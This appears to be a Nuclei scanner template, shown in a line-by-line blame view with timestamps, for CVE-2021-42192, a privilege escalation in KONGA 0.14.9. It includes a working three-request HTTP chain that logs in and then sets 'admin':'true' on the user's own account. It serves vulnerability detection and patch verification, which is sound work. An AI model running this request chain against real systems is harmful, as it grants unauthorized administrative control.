2022-06-30 18:12:29 +00:00
id : CVE-2021-42192
2022-04-01 07:39:18 +00:00
info :
2022-06-30 17:39:44 +00:00
name : KONGA 0.14.9 - Privilege Escalation
2022-04-01 07:39:18 +00:00
author : rschio
severity : high
2022-06-30 17:39:44 +00:00
description : KONGA 0.14.9 allows attackers to set higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter.
2023-09-06 12:09:01 +00:00
remediation : |
Upgrade to a patched version of KONGA or apply the necessary security patches provided by the vendor.
2022-04-01 07:39:18 +00:00
reference :
- http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html
- https://www.exploit-db.com/exploits/50521
2022-06-30 17:39:44 +00:00
- hhttps://nvd.nist.gov/vuln/detail/CVE-2021-42192
2022-07-02 12:12:07 +00:00
- https://docs.google.com/document/d/1-YU9zWiDVUps3Mb6zos3996yvZ48vW_vfOvaJLLHc4I/edit?usp=sharing
2023-07-11 19:49:27 +00:00
- https://github.com/pantsel/konga/
2022-04-01 07:39:18 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.8
2022-06-30 18:12:29 +00:00
cve-id : CVE-2021-42192
2023-07-11 19:49:27 +00:00
cwe-id : CWE-863
epss-score : 0.0106
2023-11-05 22:23:39 +00:00
epss-percentile : 0.8256
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:konga_project:konga:0.14.9:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 3
2023-07-11 19:49:27 +00:00
vendor : konga_project
product : konga
tags : authenticated,edb,cve,cve2021,konga,intrusive
2022-04-01 07:39:18 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-04-02 09:09:25 +00:00
- raw :
- |
POST /login HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json
2022-04-01 07:39:18 +00:00
2022-04-02 09:09:25 +00:00
{"password": "{{password}}", "identifier": "{{username}}" }
- |
POST /api/user/{{id}} HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
Referer : {{BaseURL}}
Content-Type : application/json;charset=utf-8
{"token": "{{token}}" }
- |
PUT /api/user/{{id}} HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
Referer : {{BaseURL}}
Content-Type : application/json;charset=utf-8
{"admin": "true", "passports": {"password": "{{password}}", "protocol": "local"}, "token": "{{token}}", "password_confirmation": "{{password}}" }
req-condition : true
2023-07-11 19:49:27 +00:00
2022-04-01 07:39:18 +00:00
matchers-condition : and
matchers :
2022-04-02 09:09:25 +00:00
- type : dsl
dsl :
2023-07-11 19:49:27 +00:00
- contains(body_2, "\"admin\":false")
- contains(body_3, "\"admin\":true")
2022-04-02 09:09:25 +00:00
condition : and
2022-04-01 07:39:18 +00:00
- type : word
2022-04-02 09:09:25 +00:00
part : header
2022-04-01 07:39:18 +00:00
words :
2023-07-11 19:49:27 +00:00
- application/json
2022-04-01 07:39:18 +00:00
2022-04-02 09:09:25 +00:00
- type : status
status :
- 200
extractors :
2022-04-01 07:39:18 +00:00
- type : regex
2022-04-02 09:09:25 +00:00
name : id
group : 1
2022-04-01 07:39:18 +00:00
regex :
2022-04-04 12:38:25 +00:00
- '"id":([0-9]+)'
2023-07-11 19:49:27 +00:00
internal : true
part : body
2022-04-01 07:39:18 +00:00
2022-04-02 09:09:25 +00:00
- type : regex
name : token
group : 1
regex :
2022-04-04 12:38:25 +00:00
- '"token":"(.*)"'
2023-07-11 19:49:27 +00:00
internal : true
part : body
2023-11-06 06:48:30 +00:00
# digest: 4a0a0047304502210091b582f94d30a269934ec35aa652ebfe8a237295c26008930b5803d53bfdc8d0022038c7de9513d4f93276c014ecf8e7d3743b27174348cc99c9497e8060c42e3dc0:922c64590222798bb761d5b6d8e72950